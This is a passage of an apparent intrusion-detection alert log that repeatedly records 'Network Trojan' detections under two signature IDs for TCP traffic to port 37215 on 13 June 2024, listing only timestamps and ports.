              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027984
              SID:2835222
              Source Port:43492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321122
              SID:2835222
              Source Port:42710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654420
              SID:2835222
              Source Port:36870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404294
              SID:2829579
              Source Port:53264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550267
              SID:2829579
              Source Port:37618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725272
              SID:2835222
              Source Port:44406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.308572
              SID:2835222
              Source Port:55850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316572
              SID:2835222
              Source Port:49408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419762
              SID:2835222
              Source Port:45706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.303933
              SID:2835222
              Source Port:42412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123734
              SID:2829579
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322893
              SID:2835222
              Source Port:58076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417514
              SID:2829579
              Source Port:36126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710017
              SID:2835222
              Source Port:52922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992609
              SID:2835222
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214629
              SID:2829579
              Source Port:41914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085629
              SID:2829579
              Source Port:58570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.298625
              SID:2835222
              Source Port:59510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175345
              SID:2835222
              Source Port:57342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568305
              SID:2835222
              Source Port:45340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913733
              SID:2829579
              Source Port:52112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780972
              SID:2835222
              Source Port:41408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474109
              SID:2829579
              Source Port:45056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656650
              SID:2829579
              Source Port:46068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781365
              SID:2829579
              Source Port:39118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240861
              SID:2829579
              Source Port:45538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302329
              SID:2835222
              Source Port:48840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801073
              SID:2835222
              Source Port:41364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317942
              SID:2829579
              Source Port:49232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027868
              SID:2835222
              Source Port:56712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835632
              SID:2829579
              Source Port:33170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669770
              SID:2835222
              Source Port:48032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604475
              SID:2835222
              Source Port:58902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016757
              SID:2835222
              Source Port:58562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629376
              SID:2829579
              Source Port:49560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786905
              SID:2835222
              Source Port:37240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042441
              SID:2835222
              Source Port:33350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992127
              SID:2835222
              Source Port:38988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110789
              SID:2829579
              Source Port:50384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028521
              SID:2829579
              Source Port:33252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369682
              SID:2835222
              Source Port:42956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608507
              SID:2829579
              Source Port:42640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.421006
              SID:2829579
              Source Port:47676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458353
              SID:2829579
              Source Port:43306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.315847
              SID:2835222
              Source Port:50020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175407
              SID:2829579
              Source Port:43940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785654
              SID:2835222
              Source Port:36004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.380493
              SID:2829579
              Source Port:53630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547016
              SID:2829579
              Source Port:33466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976307
              SID:2835222
              Source Port:49432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694854
              SID:2835222
              Source Port:38372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242462
              SID:2829579
              Source Port:34108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200246
              SID:2835222
              Source Port:39870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724545
              SID:2835222
              Source Port:58170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424210
              SID:2829579
              Source Port:36942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219607
              SID:2835222
              Source Port:40628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457777
              SID:2835222
              Source Port:40708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658647
              SID:2829579
              Source Port:38054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110658
              SID:2829579
              Source Port:57544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554063
              SID:2835222
              Source Port:51366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213693
              SID:2829579
              Source Port:34394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220987
              SID:2835222
              Source Port:58530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200056
              SID:2829579
              Source Port:40774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316903
              SID:2835222
              Source Port:50818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993068
              SID:2835222
              Source Port:33286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373957
              SID:2829579
              Source Port:43268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302897
              SID:2829579
              Source Port:48320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.241743
              SID:2835222
              Source Port:57196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245799
              SID:2829579
              Source Port:42106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990465
              SID:2835222
              Source Port:45186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090062
              SID:2835222
              Source Port:38194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228725
              SID:2829579
              Source Port:43488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936823
              SID:2835222
              Source Port:50058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.672187
              SID:2829579
              Source Port:40740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822024
              SID:2835222
              Source Port:38496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729387
              SID:2835222
              Source Port:40350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111578
              SID:2829579
              Source Port:55644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613828
              SID:2835222
              Source Port:58002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176315
              SID:2829579
              Source Port:39382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100577
              SID:2835222
              Source Port:60352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401671
              SID:2835222
              Source Port:35046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127314
              SID:2835222
              Source Port:37468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670616
              SID:2829579
              Source Port:52276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348981
              SID:2835222
              Source Port:58360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402899
              SID:2835222
              Source Port:52200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.267309
              SID:2835222
              Source Port:45474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804451
              SID:2829579
              Source Port:33476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060196
              SID:2835222
              Source Port:60424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545540
              SID:2829579
              Source Port:44176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711514
              SID:2835222
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610636
              SID:2835222
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026904
              SID:2835222
              Source Port:45496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308209
              SID:2829579
              Source Port:47698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783737
              SID:2829579
              Source Port:45178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077737
              SID:2835222
              Source Port:48568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131026
              SID:2835222
              Source Port:38824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670838
              SID:2829579
              Source Port:52916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173865
              SID:2829579
              Source Port:40380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630371
              SID:2829579
              Source Port:42176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476715
              SID:2835222
              Source Port:41990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782655
              SID:2829579
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266574
              SID:2835222
              Source Port:51168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.759059
              SID:2835222
              Source Port:46136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377715
              SID:2829579
              Source Port:59348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403559
              SID:2829579
              Source Port:50732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266640
              SID:2829579
              Source Port:60904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137112
              SID:2829579
              Source Port:36202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088572
              SID:2835222
              Source Port:47278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108501
              SID:2829579
              Source Port:40934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151858
              SID:2829579
              Source Port:59450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043010
              SID:2829579
              Source Port:33324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783627
              SID:2835222
              Source Port:56380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.232086
              SID:2835222
              Source Port:52798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605962
              SID:2829579
              Source Port:42070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842018
              SID:2829579
              Source Port:36290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710468
              SID:2835222
              Source Port:49300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976947
              SID:2835222
              Source Port:41456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440087
              SID:2829579
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782042
              SID:2829579
              Source Port:39626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754833
              SID:2835222
              Source Port:56996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790323
              SID:2829579
              Source Port:36490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996469
              SID:2835222
              Source Port:45344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099978
              SID:2835222
              Source Port:37414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993726
              SID:2829579
              Source Port:46816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132688
              SID:2835222
              Source Port:36594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093816
              SID:2835222
              Source Port:37254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253316
              SID:2829579
              Source Port:38028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523844
              SID:2835222
              Source Port:34512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042422
              SID:2829579
              Source Port:47218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993459
              SID:2829579
              Source Port:33616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128811
              SID:2835222
              Source Port:44946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229135
              SID:2829579
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611048
              SID:2835222
              Source Port:53626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401404
              SID:2829579
              Source Port:50116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231432
              SID:2829579
              Source Port:34532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194283
              SID:2829579
              Source Port:50322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612201
              SID:2835222
              Source Port:39516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992413
              SID:2829579
              Source Port:35828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.024208
              SID:2835222
              Source Port:52170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404371
              SID:2829579
              Source Port:48028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317426
              SID:2829579
              Source Port:37262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100303
              SID:2835222
              Source Port:36086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501909
              SID:2835222
              Source Port:52910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757866
              SID:2829579
              Source Port:53264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124946
              SID:2835222
              Source Port:54922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838385
              SID:2829579
              Source Port:45850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977587
              SID:2835222
              Source Port:39532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090283
              SID:2835222
              Source Port:42150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402963
              SID:2835222
              Source Port:59554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173690
              SID:2829579
              Source Port:59338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629888
              SID:2835222
              Source Port:45332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508007
              SID:2835222
              Source Port:57920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654163
              SID:2835222
              Source Port:51820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137475
              SID:2829579
              Source Port:47950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.510109
              SID:2835222
              Source Port:53510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631151
              SID:2835222
              Source Port:38554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107562
              SID:2835222
              Source Port:36438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869574
              SID:2829579
              Source Port:57872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302422
              SID:2835222
              Source Port:58770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093505
              SID:2829579
              Source Port:40242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247097
              SID:2835222
              Source Port:56792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056746
              SID:2829579
              Source Port:40804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708713
              SID:2835222
              Source Port:49530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041452
              SID:2835222
              Source Port:39666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247054
              SID:2835222
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480506
              SID:2835222
              Source Port:55478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608826
              SID:2835222
              Source Port:54826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217642
              SID:2829579
              Source Port:42100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230611
              SID:2835222
              Source Port:59864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612271
              SID:2829579
              Source Port:54352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275591
              SID:2835222
              Source Port:33168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.727665
              SID:2835222
              Source Port:57882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439945
              SID:2835222
              Source Port:47846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253219
              SID:2829579
              Source Port:59550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711565
              SID:2835222
              Source Port:36806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992317
              SID:2829579
              Source Port:41732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437428
              SID:2829579
              Source Port:47704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502147
              SID:2829579
              Source Port:40004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749182
              SID:2829579
              Source Port:55680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971104
              SID:2829579
              Source Port:51024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078360
              SID:2835222
              Source Port:53954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044672
              SID:2829579
              Source Port:41162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709043
              SID:2835222
              Source Port:50772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487271
              SID:2829579
              Source Port:55596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212098
              SID:2835222
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355917
              SID:2829579
              Source Port:44616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787934
              SID:2835222
              Source Port:53320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612988
              SID:2829579
              Source Port:46072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091211
              SID:2835222
              Source Port:34522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091344
              SID:2835222
              Source Port:34128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487918
              SID:2829579
              Source Port:33208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694777
              SID:2829579
              Source Port:48230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088402
              SID:2829579
              Source Port:41746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132426
              SID:2835222
              Source Port:58486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820137
              SID:2835222
              Source Port:59608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.138063
              SID:2829579
              Source Port:49866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.976621
              SID:2835222
              Source Port:41880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
